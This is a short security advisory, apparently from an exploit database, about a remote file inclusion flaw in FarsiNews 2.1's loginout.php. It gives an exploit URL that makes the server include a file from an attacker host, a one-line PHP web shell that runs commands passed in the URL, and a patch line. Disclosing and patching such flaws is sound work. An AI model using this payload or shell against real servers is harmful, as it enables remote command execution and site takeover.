FarsiNews 2.1 PHP Remote File Inclusion

2006.01.31
Credit: Hamid Ebadi
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-Other


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Remote File Inclusion in FarsiNews 2.1 and below Credit: The information has been provided by Hamid Ebadi (Hamid Network Security Team) :admin (at) hamid (dot) ir. [email concealed] The original article can be found at : http://hamid.ir/security Vulnerable Systems: FarsiNews 2.1 Beta 2 and below Vulnerable Code: The following lines in loginout.php : require_once($cutepath."/inc/functions.inc.php"); require_once($cutepath."/data/config.php"); Exploits: If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file. The following URL will cause the server to include external files ( phpshell.txt ): http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell .txt? phpshell.txt ------------------- <? system ($_GET['cmd']); die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid Network Security Team)</h3> "); ?> -----[EOF]-------- Workaround: use FarsiNews 2.5 or for Unofficial Patch , simply add the following line in the second line of loginout.php: if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -->http://hamid.ir ( Hamid Network Security Team) "); } Signature


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top